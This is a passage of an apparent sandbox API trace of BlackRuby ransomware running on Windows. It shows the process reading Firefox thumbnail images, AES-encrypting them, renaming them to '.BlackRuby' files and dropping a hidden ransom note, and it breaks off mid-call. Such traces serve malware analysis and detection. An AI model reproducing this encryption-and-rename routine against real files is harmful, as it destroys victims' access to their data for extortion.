returned 0x12 [0049.548] SetErrorMode (uMode=0x1) returned 0x0 [0049.548] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.549] GetLastError () returned 0x12 [0049.549] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.549] GetLastError () returned 0x12 [0049.550] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.550] GetLastError () returned 0x12 [0049.550] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.550] GetLastError () returned 0x12 [0049.550] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.550] GetLastError () returned 0x12 [0049.550] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.550] GetLastError () returned 0x12 [0049.550] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.550] GetLastError () returned 0x12 [0049.551] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.551] GetLastError () returned 0x12 [0049.551] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.551] GetLastError () returned 0x12 [0049.551] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.552] GetLastError () returned 0x12 [0049.552] SetErrorMode (uMode=0x1) returned 0x0 [0049.552] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\055464b452b05946907d444400041929.png" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\thumbnails\\055464b452b05946907d444400041929.png"), fInfoLevelId=0x0, lpFileInformation=0x1bd8644 | out: lpFileInformation=0x1bd8644*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc35ddb70, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0xc35ddb70, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xc35ddb70, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x492a)) returned 1 [0049.553] GetLastError () returned 0x12 [0049.554] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\055464b452b05946907d444400041929.png", nBufferLength=0x105, lpBuffer=0x18e6cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\055464b452b05946907d444400041929.png", lpFilePart=0x0) returned 0x78 [0049.554] GetLastError () returned 0x12 [0049.554] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\055464b452b05946907d444400041929.png", nBufferLength=0x105, lpBuffer=0x18e5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\055464b452b05946907d444400041929.png", lpFilePart=0x0) returned 0x78 [0049.554] GetLastError () returned 0x12 [0049.554] SetErrorMode (uMode=0x1) returned 0x0 [0049.554] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\055464b452b05946907d444400041929.png" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\thumbnails\\055464b452b05946907d444400041929.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.554] GetLastError () returned 0x0 [0049.554] GetFileType (hFile=0x184) returned 0x1 [0049.554] GetFileType (hFile=0x184) returned 0x1 [0049.555] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eb54 | out: lpFileSizeHigh=0x18eb54*=0x0) returned 0x492a [0049.555] GetLastError () returned 0x0 [0049.555] ReadFile (in: hFile=0x184, lpBuffer=0x1bda4f4, nNumberOfBytesToRead=0x492a, lpNumberOfBytesRead=0x18eafc, lpOverlapped=0x0 | out: lpBuffer=0x1bda4f4*, lpNumberOfBytesRead=0x18eafc*=0x492a, lpOverlapped=0x0) returned 1 [0049.563] GetLastError () returned 0x0 [0049.563] CloseHandle (hObject=0x184) returned 1 [0049.563] GetLastError () returned 0x0 [0049.563] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\055464b452b05946907d444400041929.png", nBufferLength=0x105, lpBuffer=0x18e6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\055464b452b05946907d444400041929.png", lpFilePart=0x0) returned 0x78 [0049.564] GetLastError () returned 0x0 [0049.564] SetErrorMode (uMode=0x1) returned 0x0 [0049.564] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\055464b452b05946907d444400041929.png" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\thumbnails\\055464b452b05946907d444400041929.png"), fInfoLevelId=0x0, lpFileInformation=0x18eb64 | out: lpFileInformation=0x18eb64*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc35ddb70, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0xc35ddb70, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xc35ddb70, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x492a)) returned 1 [0049.564] GetLastError () returned 0x0 [0049.564] SetErrorMode (uMode=0x0) returned 0x1 [0049.564] CryptAcquireContextW (in: phProv=0x18eac4, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18eac4*=0x37c790) returned 1 [0049.565] GetLastError () returned 0x0 [0049.605] CryptImportKey (in: hProv=0x37c790, pbData=0x1c3dbd0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18eaa0 | out: phKey=0x18eaa0*=0x360fa0) returned 1 [0049.605] GetLastError () returned 0x0 [0049.605] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0049.605] GetLastError () returned 0x0 [0049.611] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0049.611] GetLastError () returned 0x0 [0049.611] CryptDuplicateKey (in: hKey=0x360fa0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ea5c | out: phKey=0x18ea5c*=0x360ae0) returned 1 [0049.611] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0049.611] GetLastError () returned 0x0 [0049.611] CryptSetKeyParam (hKey=0x360ae0, dwParam=0x4, pbData=0x1c6ac1c*=0x1, dwFlags=0x0) returned 1 [0049.611] GetLastError () returned 0x0 [0049.611] CryptSetKeyParam (hKey=0x360ae0, dwParam=0x1, pbData=0x1c6abe8, dwFlags=0x0) returned 1 [0049.611] GetLastError () returned 0x0 [0049.611] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c6ac64*, pdwDataLen=0x18eaec*=0x4a20, dwBufLen=0x4a20 | out: pbData=0x1c6ac64*, pdwDataLen=0x18eaec*=0x4a20) returned 1 [0049.611] GetLastError () returned 0x0 [0049.611] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c740d0*, pdwDataLen=0x18eb04*=0x10, dwBufLen=0x10 | out: pbData=0x1c740d0*, pdwDataLen=0x18eb04*=0x10) returned 1 [0049.611] GetLastError () returned 0x0 [0049.611] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c74100*, pdwDataLen=0x18eb0c*=0x0, dwBufLen=0x10 | out: pbData=0x1c74100*, pdwDataLen=0x18eb0c*=0x10) returned 1 [0049.611] GetLastError () returned 0x0 [0049.611] CryptDestroyKey (hKey=0x360fa0) returned 1 [0049.611] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0049.611] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0049.611] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\055464b452b05946907d444400041929.png", nBufferLength=0x105, lpBuffer=0x18e5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\055464b452b05946907d444400041929.png", lpFilePart=0x0) returned 0x78 [0049.611] GetLastError () returned 0x0 [0049.611] SetErrorMode (uMode=0x1) returned 0x0 [0049.612] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\055464b452b05946907d444400041929.png" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\thumbnails\\055464b452b05946907d444400041929.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.613] GetLastError () returned 0xb7 [0049.613] GetFileType (hFile=0x184) returned 0x1 [0049.613] SetErrorMode (uMode=0x0) returned 0x1 [0049.613] GetFileType (hFile=0x184) returned 0x1 [0049.615] CloseHandle (hObject=0x184) returned 1 [0049.615] GetLastError () returned 0xb7 [0049.615] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\055464b452b05946907d444400041929.png", nBufferLength=0x105, lpBuffer=0x18e6cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\055464b452b05946907d444400041929.png", lpFilePart=0x0) returned 0x78 [0049.615] GetLastError () returned 0xb7 [0049.615] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\Encrypted_R9jww717yE7ZDO72Ji8oPhEzzWEgKcCpL9Mi.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e6cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\Encrypted_R9jww717yE7ZDO72Ji8oPhEzzWEgKcCpL9Mi.BlackRuby", lpFilePart=0x0) returned 0x8c [0049.615] GetLastError () returned 0xb7 [0049.615] SetErrorMode (uMode=0x1) returned 0x0 [0049.615] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\055464b452b05946907d444400041929.png" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\thumbnails\\055464b452b05946907d444400041929.png"), fInfoLevelId=0x0, lpFileInformation=0x18eb4c | out: lpFileInformation=0x18eb4c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc35ddb70, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0xc35ddb70, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x25c72740, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x4a30)) returned 1 [0049.615] GetLastError () returned 0xb7 [0049.615] SetErrorMode (uMode=0x0) returned 0x1 [0049.615] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\055464b452b05946907d444400041929.png" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\thumbnails\\055464b452b05946907d444400041929.png"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\Encrypted_R9jww717yE7ZDO72Ji8oPhEzzWEgKcCpL9Mi.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\thumbnails\\encrypted_r9jww717ye7zdo72ji8ophezzwegkccpl9mi.blackruby")) returned 1 [0049.615] GetLastError () returned 0xb7 [0049.616] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x6c [0049.616] GetLastError () returned 0xb7 [0049.616] SetErrorMode (uMode=0x1) returned 0x0 [0049.616] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\thumbnails\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.616] GetLastError () returned 0x0 [0049.616] GetFileType (hFile=0x184) returned 0x1 [0049.616] SetErrorMode (uMode=0x0) returned 0x1 [0049.616] GetFileType (hFile=0x184) returned 0x1 [0049.618] CloseHandle (hObject=0x184) returned 1 [0049.618] GetLastError () returned 0x0 [0049.618] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e6d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x6c [0049.618] GetLastError () returned 0x0 [0049.618] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0049.618] GetLastError () returned 0x0 [0049.618] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png", nBufferLength=0x105, lpBuffer=0x18e704, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png", lpFilePart=0x0) returned 0x78 [0049.618] GetLastError () returned 0x0 [0049.618] SetErrorMode (uMode=0x1) returned 0x0 [0049.618] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png"), fInfoLevelId=0x0, lpFileInformation=0x1c9f1b4 | out: lpFileInformation=0x1c9f1b4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x74a31b90, ftCreationTime.dwHighDateTime=0x1d2da24, ftLastAccessTime.dwLowDateTime=0x74a31b90, ftLastAccessTime.dwHighDateTime=0x1d2da24, ftLastWriteTime.dwLowDateTime=0x74a31b90, ftLastWriteTime.dwHighDateTime=0x1d2da24, nFileSizeHigh=0x0, nFileSizeLow=0x326b)) returned 1 [0049.619] GetLastError () returned 0x0 [0049.619] SetErrorMode (uMode=0x0) returned 0x1 [0049.619] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png", nBufferLength=0x105, lpBuffer=0x18e6cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png", lpFilePart=0x0) returned 0x78 [0049.619] GetLastError () returned 0x0 [0049.619] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png", nBufferLength=0x105, lpBuffer=0x18e5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png", lpFilePart=0x0) returned 0x78 [0049.619] GetLastError () returned 0x0 [0049.619] SetErrorMode (uMode=0x1) returned 0x0 [0049.619] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.619] GetLastError () returned 0x0 [0049.619] GetFileType (hFile=0x184) returned 0x1 [0049.619] SetErrorMode (uMode=0x0) returned 0x1 [0049.619] GetFileType (hFile=0x184) returned 0x1 [0049.619] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eb54 | out: lpFileSizeHigh=0x18eb54*=0x0) returned 0x326b [0049.619] GetLastError () returned 0x0 [0049.619] ReadFile (in: hFile=0x184, lpBuffer=0x1ca141c, nNumberOfBytesToRead=0x326b, lpNumberOfBytesRead=0x18eafc, lpOverlapped=0x0 | out: lpBuffer=0x1ca141c*, lpNumberOfBytesRead=0x18eafc*=0x326b, lpOverlapped=0x0) returned 1 [0049.635] GetLastError () returned 0x0 [0049.635] CloseHandle (hObject=0x184) returned 1 [0049.636] GetLastError () returned 0x0 [0049.636] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png", nBufferLength=0x105, lpBuffer=0x18e6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png", lpFilePart=0x0) returned 0x78 [0049.636] GetLastError () returned 0x0 [0049.636] SetErrorMode (uMode=0x1) returned 0x0 [0049.636] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png"), fInfoLevelId=0x0, lpFileInformation=0x18eb64 | out: lpFileInformation=0x18eb64*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x74a31b90, ftCreationTime.dwHighDateTime=0x1d2da24, ftLastAccessTime.dwLowDateTime=0x74a31b90, ftLastAccessTime.dwHighDateTime=0x1d2da24, ftLastWriteTime.dwLowDateTime=0x74a31b90, ftLastWriteTime.dwHighDateTime=0x1d2da24, nFileSizeHigh=0x0, nFileSizeLow=0x326b)) returned 1 [0049.636] GetLastError () returned 0x0 [0049.636] SetErrorMode (uMode=0x0) returned 0x1 [0049.647] CryptImportKey (in: hProv=0x37c708, pbData=0x1d01d78, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18eaa0 | out: phKey=0x18eaa0*=0x360b20) returned 1 [0049.647] GetLastError () returned 0x0 [0049.647] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0049.647] GetLastError () returned 0x0 [0049.652] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0049.652] GetLastError () returned 0x0 [0049.652] CryptDuplicateKey (in: hKey=0x360b20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ea5c | out: phKey=0x18ea5c*=0x360a20) returned 1 [0049.652] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0049.652] GetLastError () returned 0x0 [0049.652] CryptSetKeyParam (hKey=0x360a20, dwParam=0x4, pbData=0x1d2edc4*=0x1, dwFlags=0x0) returned 1 [0049.653] GetLastError () returned 0x0 [0049.653] CryptSetKeyParam (hKey=0x360a20, dwParam=0x1, pbData=0x1d2ed90, dwFlags=0x0) returned 1 [0049.653] GetLastError () returned 0x0 [0049.653] CryptEncrypt (in: hKey=0x360a20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d2ee0c*, pdwDataLen=0x18eaec*=0x3360, dwBufLen=0x3360 | out: pbData=0x1d2ee0c*, pdwDataLen=0x18eaec*=0x3360) returned 1 [0049.653] GetLastError () returned 0x0 [0049.653] CryptEncrypt (in: hKey=0x360a20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b3db64*, pdwDataLen=0x18eb04*=0x10, dwBufLen=0x10 | out: pbData=0x1b3db64*, pdwDataLen=0x18eb04*=0x10) returned 1 [0049.653] GetLastError () returned 0x0 [0049.653] CryptEncrypt (in: hKey=0x360a20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1b3db94*, pdwDataLen=0x18eb0c*=0x0, dwBufLen=0x10 | out: pbData=0x1b3db94*, pdwDataLen=0x18eb0c*=0x10) returned 1 [0049.653] GetLastError () returned 0x0 [0049.653] CryptDestroyKey (hKey=0x360b20) returned 1 [0049.653] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0049.653] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0049.654] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png", nBufferLength=0x105, lpBuffer=0x18e5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png", lpFilePart=0x0) returned 0x78 [0049.654] GetLastError () returned 0x0 [0049.654] SetErrorMode (uMode=0x1) returned 0x0 [0049.655] GetFileType (hFile=0x184) returned 0x1 [0049.655] GetFileType (hFile=0x184) returned 0x1 [0049.656] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\Encrypted_vABOzKctDeHszURVNQVBrLEAVgG64smAv97uTAnMW5BgmMr.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\thumbnails\\encrypted_vabozkctdehszurvnqvbrleavgg64smav97utanmw5bgmmr.blackruby")) returned 1 [0049.657] GetLastError () returned 0xb7 [0049.658] SetErrorMode (uMode=0x0) returned 0x1 [0049.658] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\a1d1a508444ac649673a66fafc239be9.png", nBufferLength=0x105, lpBuffer=0x18e704, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\a1d1a508444ac649673a66fafc239be9.png", lpFilePart=0x0) returned 0x78 [0049.658] GetLastError () returned 0x5 [0049.658] SetErrorMode (uMode=0x1) returned 0x0 [0049.659] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\a1d1a508444ac649673a66fafc239be9.png" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\thumbnails\\a1d1a508444ac649673a66fafc239be9.png"), fInfoLevelId=0x0, lpFileInformation=0x1b64d9c | out: lpFileInformation=0x1b64d9c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc35ddb70, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0xc35ddb70, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xc35ddb70, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x492a)) returned 1 [0049.659] GetLastError () returned 0x5 [0049.659] SetErrorMode (uMode=0x0) returned 0x1 [0049.659] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\a1d1a508444ac649673a66fafc239be9.png", nBufferLength=0x105, lpBuffer=0x18e6cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\a1d1a508444ac649673a66fafc239be9.png", lpFilePart=0x0) returned 0x78 [0049.659] GetLastError () returned 0x5 [0049.659] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\a1d1a508444ac649673a66fafc239be9.png", nBufferLength=0x105, lpBuffer=0x18e5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\a1d1a508444ac649673a66fafc239be9.png", lpFilePart=0x0) returned 0x78 [0049.659] GetLastError () returned 0x5 [0049.659] SetErrorMode (uMode=0x1) returned 0x0 [0049.659] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\a1d1a508444ac649673a66fafc239be9.png" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\thumbnails\\a1d1a508444ac649673a66fafc239be9.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.659] GetLastError () returned 0x0 [0049.659] GetFileType (hFile=0x184) returned 0x1 [0049.660] SetErrorMode (uMode=0x0) returned 0x1 [0049.660] GetFileType (hFile=0x184) returned 0x1 [0049.660] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eb54 | out: lpFileSizeHigh=0x18eb54*=0x0) returned 0x492a [0049.660] GetLastError () returned 0x0 [0049.660] ReadFile (in: hFile=0x184, lpBuffer=0x1b671a8, nNumberOfBytesToRead=0x492a, lpNumberOfBytesRead=0x18eafc, lpOverlapped=0x0 | out: lpBuffer=0x1b671a8*, lpNumberOfBytesRead=0x18eafc*=0x492a, lpOverlapped=0x0) returned 1 [0049.672] GetLastError () returned 0x0 [0049.672] CloseHandle (hObject=0x184) returned 1 [0049.672] GetLastError () returned 0x0 [0049.672] GetFullPathNameW (in: 